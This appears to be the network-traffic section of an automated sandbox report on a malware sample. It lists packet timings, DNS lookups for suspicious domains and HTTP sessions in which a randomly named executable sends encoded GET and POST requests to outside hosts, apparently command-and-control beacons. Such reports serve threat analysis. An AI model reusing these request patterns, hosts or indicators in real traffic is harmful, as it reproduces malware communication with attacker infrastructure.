Jan 10, 2025 20:20:12.712872982 CET	80	49985	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:12.712915897 CET	80	49985	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:12.712973118 CET	49985	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:13.027060032 CET	49985	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:14.045722961 CET	49986	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:14.050659895 CET	80	49986	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:14.052862883 CET	49986	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:14.069173098 CET	49986	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:14.073997974 CET	80	49986	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:14.074127913 CET	80	49986	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:14.779397964 CET	80	49986	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:14.779458046 CET	80	49986	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:14.779506922 CET	49986	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:15.574013948 CET	49986	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:16.593280077 CET	49987	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:16.598153114 CET	80	49987	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:16.599163055 CET	49987	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:16.608289957 CET	49987	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:16.613221884 CET	80	49987	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:17.190666914 CET	80	49987	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:17.190741062 CET	80	49987	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:17.190876961 CET	49987	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:17.193963051 CET	49987	80	192.168.2.5	66.29.149.46
Jan 10, 2025 20:20:17.198838949 CET	80	49987	66.29.149.46	192.168.2.5
Jan 10, 2025 20:20:22.265919924 CET	49988	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:22.270734072 CET	80	49988	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:22.270848989 CET	49988	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:22.285085917 CET	49988	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:22.289848089 CET	80	49988	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:22.898444891 CET	80	49988	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:22.898463011 CET	80	49988	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:22.898570061 CET	49988	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:23.792953014 CET	49988	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:24.817137003 CET	49989	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:24.822174072 CET	80	49989	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:24.822264910 CET	49989	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:24.836882114 CET	49989	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:24.841732979 CET	80	49989	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:25.474284887 CET	80	49989	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:25.474390030 CET	80	49989	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:25.474482059 CET	49989	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:26.342226028 CET	49989	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:27.358357906 CET	49990	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:27.424418926 CET	80	49990	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:27.424634933 CET	49990	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:27.439835072 CET	49990	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:27.444667101 CET	80	49990	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:27.444813013 CET	80	49990	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:28.037740946 CET	80	49990	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:28.040822029 CET	80	49990	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:28.040899038 CET	49990	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:28.954318047 CET	49990	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:29.967931032 CET	49991	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:29.972743034 CET	80	49991	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:29.975847960 CET	49991	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:29.981981039 CET	49991	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:29.986762047 CET	80	49991	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:30.582027912 CET	80	49991	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:30.582075119 CET	80	49991	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:30.582112074 CET	80	49991	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:30.582160950 CET	80	49991	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:30.582221985 CET	49991	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:30.582312107 CET	49991	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:30.585016966 CET	49991	80	192.168.2.5	217.70.184.50
Jan 10, 2025 20:20:30.589955091 CET	80	49991	217.70.184.50	192.168.2.5
Jan 10, 2025 20:20:36.096076965 CET	49992	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:36.100902081 CET	80	49992	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:36.100989103 CET	49992	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:36.116164923 CET	49992	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:36.120960951 CET	80	49992	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:37.040646076 CET	80	49992	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:37.040738106 CET	80	49992	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:37.040855885 CET	49992	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:37.629281998 CET	49992	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:38.639672041 CET	49993	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:38.644618988 CET	80	49993	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:38.644902945 CET	49993	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:38.658575058 CET	49993	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:38.663378000 CET	80	49993	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:39.798208952 CET	80	49993	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:39.798314095 CET	80	49993	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:39.798455954 CET	49993	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:40.167932987 CET	49993	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:41.187532902 CET	49994	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:41.192365885 CET	80	49994	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:41.192451000 CET	49994	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:41.207231045 CET	49994	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:41.212065935 CET	80	49994	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:41.212146044 CET	80	49994	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:42.148300886 CET	80	49994	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:42.148468018 CET	80	49994	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:42.148535967 CET	49994	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:42.715337038 CET	49994	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:43.733738899 CET	49995	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:43.738545895 CET	80	49995	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:43.738648891 CET	49995	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:43.748008013 CET	49995	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:43.752826929 CET	80	49995	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:44.724793911 CET	80	49995	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:44.724884033 CET	80	49995	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:44.725045919 CET	49995	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:44.727804899 CET	49995	80	192.168.2.5	13.228.81.39
Jan 10, 2025 20:20:44.732866049 CET	80	49995	13.228.81.39	192.168.2.5
Jan 10, 2025 20:20:49.760921955 CET	49996	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:49.765724897 CET	80	49996	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:49.765818119 CET	49996	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:49.779175043 CET	49996	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:49.784008026 CET	80	49996	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:50.252084970 CET	80	49996	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:50.252360106 CET	80	49996	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:50.252437115 CET	49996	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:51.292973042 CET	49996	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:52.311523914 CET	49997	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:52.316368103 CET	80	49997	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:52.316474915 CET	49997	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:52.331444979 CET	49997	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:52.336209059 CET	80	49997	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:53.839685917 CET	49997	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:53.887850046 CET	80	49997	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:54.859086037 CET	49998	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:54.864115000 CET	80	49998	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:54.864609957 CET	49998	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:54.878449917 CET	49998	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:54.883346081 CET	80	49998	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:54.883435965 CET	80	49998	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:55.330008984 CET	80	49998	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:55.330138922 CET	80	49998	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:55.330492973 CET	49998	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:55.688050985 CET	80	49997	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:55.688114882 CET	49997	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:56.386571884 CET	49998	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:57.407463074 CET	49999	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:57.412349939 CET	80	49999	13.248.169.48	192.168.2.5
Jan 10, 2025 20:20:57.412447929 CET	49999	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:57.421916008 CET	49999	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:20:57.428101063 CET	80	49999	13.248.169.48	192.168.2.5
Jan 10, 2025 20:21:06.928105116 CET	80	49999	13.248.169.48	192.168.2.5
Jan 10, 2025 20:21:06.928152084 CET	80	49999	13.248.169.48	192.168.2.5
Jan 10, 2025 20:21:06.928431034 CET	49999	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:21:06.931193113 CET	49999	80	192.168.2.5	13.248.169.48
Jan 10, 2025 20:21:06.936042070 CET	80	49999	13.248.169.48	192.168.2.5
Jan 10, 2025 20:21:11.960946083 CET	50000	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:11.965801001 CET	80	50000	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:11.965918064 CET	50000	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:11.980506897 CET	50000	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:11.985330105 CET	80	50000	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:13.496036053 CET	50000	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:13.501157045 CET	80	50000	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:13.502052069 CET	50000	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:14.514483929 CET	50001	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:14.519515991 CET	80	50001	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:14.519618988 CET	50001	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:14.534379959 CET	50001	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:14.539294004 CET	80	50001	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:16.042856932 CET	50001	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:16.047977924 CET	80	50001	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:16.048082113 CET	50001	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:17.061567068 CET	50002	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:17.066458941 CET	80	50002	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:17.066728115 CET	50002	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:17.086330891 CET	50002	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:17.091335058 CET	80	50002	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:17.091370106 CET	80	50002	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:18.727819920 CET	80	50002	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:18.728326082 CET	80	50002	104.21.96.1	192.168.2.5
Jan 10, 2025 20:21:18.728967905 CET	50002	80	192.168.2.5	104.21.96.1
Jan 10, 2025 20:21:18.902751923 CET	50002	80	192.168.2.5	104.21.96.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:19:02.959566116 CET	59291	53	192.168.2.5	1.1.1.1
Jan 10, 2025 20:19:03.303741932 CET	53	59291	1.1.1.1	192.168.2.5
Jan 10, 2025 20:19:19.343060970 CET	52169	53	192.168.2.5	1.1.1.1
Jan 10, 2025 20:19:20.051266909 CET	53	52169	1.1.1.1	192.168.2.5
Jan 10, 2025 20:19:33.905606031 CET	60082	53	192.168.2.5	1.1.1.1
Jan 10, 2025 20:19:34.704086065 CET	53	60082	1.1.1.1	192.168.2.5
Jan 10, 2025 20:20:08.936918020 CET	50510	53	192.168.2.5	1.1.1.1
Jan 10, 2025 20:20:08.948440075 CET	53	50510	1.1.1.1	192.168.2.5
Jan 10, 2025 20:20:22.202910900 CET	58489	53	192.168.2.5	1.1.1.1
Jan 10, 2025 20:20:22.263397932 CET	53	58489	1.1.1.1	192.168.2.5
Jan 10, 2025 20:20:35.593575001 CET	63139	53	192.168.2.5	1.1.1.1
Jan 10, 2025 20:20:36.093452930 CET	53	63139	1.1.1.1	192.168.2.5
Jan 10, 2025 20:20:49.733748913 CET	59646	53	192.168.2.5	1.1.1.1
Jan 10, 2025 20:20:49.758483887 CET	53	59646	1.1.1.1	192.168.2.5
Jan 10, 2025 20:21:11.937103987 CET	63185	53	192.168.2.5	1.1.1.1
Jan 10, 2025 20:21:11.957325935 CET	53	63185	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 20:19:02.959566116 CET	192.168.2.5	1.1.1.1	0x3a18	Standard query (0)	www.qqa79.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:19.343060970 CET	192.168.2.5	1.1.1.1	0x7c91	Standard query (0)	www.gk88top.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:33.905606031 CET	192.168.2.5	1.1.1.1	0x1ef6	Standard query (0)	www.127358.win	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:08.936918020 CET	192.168.2.5	1.1.1.1	0x63ac	Standard query (0)	www.infohive.website	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:22.202910900 CET	192.168.2.5	1.1.1.1	0xc075	Standard query (0)	www.sunnyz.store	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:35.593575001 CET	192.168.2.5	1.1.1.1	0xf6a9	Standard query (0)	www.muasamgiare.click	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:49.733748913 CET	192.168.2.5	1.1.1.1	0x4b86	Standard query (0)	www.sfantulandrei.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:21:11.937103987 CET	192.168.2.5	1.1.1.1	0xb117	Standard query (0)	www.mffnow.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 20:19:03.303741932 CET	1.1.1.1	192.168.2.5	0x3a18	No error (0)	www.qqa79.top	qqa79.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:19:03.303741932 CET	1.1.1.1	192.168.2.5	0x3a18	No error (0)	qqa79.top		38.47.233.21	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:20.051266909 CET	1.1.1.1	192.168.2.5	0x7c91	No error (0)	www.gk88top.top		172.67.137.47	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:20.051266909 CET	1.1.1.1	192.168.2.5	0x7c91	No error (0)	www.gk88top.top		104.21.7.187	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:34.704086065 CET	1.1.1.1	192.168.2.5	0x1ef6	No error (0)	www.127358.win		206.238.89.119	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:08.948440075 CET	1.1.1.1	192.168.2.5	0x63ac	No error (0)	www.infohive.website		66.29.149.46	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:22.263397932 CET	1.1.1.1	192.168.2.5	0xc075	No error (0)	www.sunnyz.store	webredir.vip.gandi.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:20:22.263397932 CET	1.1.1.1	192.168.2.5	0xc075	No error (0)	webredir.vip.gandi.net		217.70.184.50	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:36.093452930 CET	1.1.1.1	192.168.2.5	0xf6a9	No error (0)	www.muasamgiare.click	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:20:36.093452930 CET	1.1.1.1	192.168.2.5	0xf6a9	No error (0)	dns.ladipage.com		13.228.81.39	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:36.093452930 CET	1.1.1.1	192.168.2.5	0xf6a9	No error (0)	dns.ladipage.com		18.139.62.226	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:49.758483887 CET	1.1.1.1	192.168.2.5	0x4b86	No error (0)	www.sfantulandrei.info		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:20:49.758483887 CET	1.1.1.1	192.168.2.5	0x4b86	No error (0)	www.sfantulandrei.info		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:21:11.957325935 CET	1.1.1.1	192.168.2.5	0xb117	No error (0)	www.mffnow.info		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:21:11.957325935 CET	1.1.1.1	192.168.2.5	0xb117	No error (0)	www.mffnow.info		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:21:11.957325935 CET	1.1.1.1	192.168.2.5	0xb117	No error (0)	www.mffnow.info		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:21:11.957325935 CET	1.1.1.1	192.168.2.5	0xb117	No error (0)	www.mffnow.info		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:21:11.957325935 CET	1.1.1.1	192.168.2.5	0xb117	No error (0)	www.mffnow.info		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:21:11.957325935 CET	1.1.1.1	192.168.2.5	0xb117	No error (0)	www.mffnow.info		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:21:11.957325935 CET	1.1.1.1	192.168.2.5	0xb117	No error (0)	www.mffnow.info		104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.qqa79.top

www.gk88top.top

www.127358.win

www.infohive.website

www.sunnyz.store

www.muasamgiare.click

www.sfantulandrei.info

www.mffnow.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49940	38.47.233.21	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:03.376096964 CET	590	OUT	GET /t67p/?vNTT0=e8zLx&_6yxCX=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXJ+0CfIXjZtKXfKieWYYCHFg55Ay66I4b6tmYJwJaY/ccyg== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.qqa79.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Jan 10, 2025 20:19:04.222085953 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 19:19:04 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49975	172.67.137.47	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:19:20.073458910 CET	850	OUT	POST /vjnn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.gk88top.top Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 207 Cache-Control: no-cache Origin: http://www.gk88top.top Referer: http://www.gk88top.top/vjnn/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 59 39 4f 45 79 55 4f 4e 66 6e 2b 36 65 56 76 43 69 75 51 6c 31 76 4b 6e 36 50 55 6b 67 4d 65 55 71 78 4a 68 67 6b 3d Data Ascii: _6yxCX=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeuY9OEyUONfn+6eVvCiuQl1vKn6PUkgMeUqxJhgk=
Jan 10, 2025 20:19:21.138983011 CET	971	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:19:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B52U0WABbBFYZdzqH44M6hS2Viuv2h%2F7YmcEpl3BnMEzGGam2S7FadhGTXdeNFFCnuvYDYnWJ2RXY%2Bcs96fHeDpgA58KQ2aMCIVEIlCqn%2FFVvAsK92zWYwdeLUfKUUMkurg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff04a0fe0e4352-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2465&min_rtt=2465&rtt_var=1232&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=850&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49976	172.67.137.47	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
